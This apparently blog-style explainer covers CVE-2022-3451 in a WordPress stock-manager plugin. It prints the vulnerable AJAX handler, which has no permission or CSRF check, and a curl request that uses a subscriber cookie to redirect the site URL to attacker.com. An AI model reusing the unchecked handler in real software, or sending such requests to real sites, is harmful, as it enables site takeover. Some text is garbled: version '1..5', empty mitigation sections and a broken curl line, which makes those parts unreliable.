WordPress powers millions of websites—but with popularity comes risk. A recent vulnerability, CVE-2022-3451, was uncovered in the Product Stock Manager plugin, which should send a warning to anyone running WordPress with third-party plugins. This long read dives deep into the issue, shows the vulnerable code, and explains how this flaw could allow even the lowest-privileged users to tamper with your site’s core settings.
What Is CVE-2022-3451?
CVE-2022-3451 is an authorization vulnerability discovered in the Product Stock Manager plugin for WordPress, affecting versions before 1..5. The plugin failed to check if a requesting user should be allowed to perform sensitive AJAX actions. Even worse, these requests weren't protected from CSRF (Cross Site Request Forgery) attacks.
In short: Even a basic “subscriber” user could update critical site options just by sending a crafted request.
How Did This Happen?
WordPress plugins often use AJAX for background communication—say, updating stock quantities without reloading the page. These requests are handled in PHP, and should check:
The request is genuine (checked using a CSRF “nonce”).
Unfortunately, prior to version 1..5, Product Stock Manager didn’t correctly check permissions or verify CSRF tokens on some AJAX calls. Here’s a simplified look at the problem.
Vulnerable Code (Simplified Snippet)
The vulnerable code resided in the plugin’s PHP files, where AJAX handlers were registered like this:
add_action('wp_ajax_psm_update_option', 'psm_update_option_callback');
function psm_update_option_callback() {
// No capability check!
// No CSRF (nonce) check!
$option_name = $_POST['option_name'];
$option_value = $_POST['option_value'];
update_option($option_name, $option_value);
echo 'success';
wp_die();
}
In this code, any logged-in user (subscriber, contributor, author, etc.) could send an AJAX POST request to /wp-admin/admin-ajax.php and update any WordPress option—without proving who they are, and without a CSRF check.
What Could Go Wrong?
WordPress “options” control site behavior, appearance, and even the ability to log in. A crafty attacker could:
- Change your site url or home url (locking everyone out!)
Deactivate security plugins by altering their options
The attacker only needs a basic subscriber account—one of the lowest WordPress roles.
How an Exploit Works
Here’s how a complete exploit looks. All you need is a subscriber login (easy to get on many blogs) and a POST request:
curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
--data "action=psm_update_option" \
--data "option_name=siteurl" \
--data "option_value=https://attacker.com";
--cookie "wordpress_logged_in_xxx=your-subscriber-cookie"
This request would instantly change the “siteurl” of the WordPress site, breaking it or redirecting all users. No admin password needed!
An attacker could also weaponize this in a CSRF attack, tricking an admin into clicking a malicious link or visiting a page, which would send a hidden POST request changing critical settings.
Original References and Mitigations
- WPScan Advisory: CVE-2022-3451
- Plugin Changelog and Patch
Fixed in version 1..5: The developer added checks like current_user_can('manage_options') and WordPress nonce verification to secure AJAX requests.
Mitigation:
Conclusion: Lessons Learned
CVE-2022-3451 is a textbook case of overlooked security in plugin code. Even a simple check—current_user_can('manage_options')—would have stopped this. Always ensure:
Stay aware, stay updated, and check your site’s plugins today.
*For more details:*
- WPScan Full Advisory
- Official Plugin Page
- How to audit your WordPress for vulnerabilities
Did you find this useful? Share your thoughts or ask about auditing your own plugin’s AJAX in the comments!
Timeline
Published on: 11/07/2022 10:15:00 UTC
Last modified on: 07/21/2023 18:21:00 UTC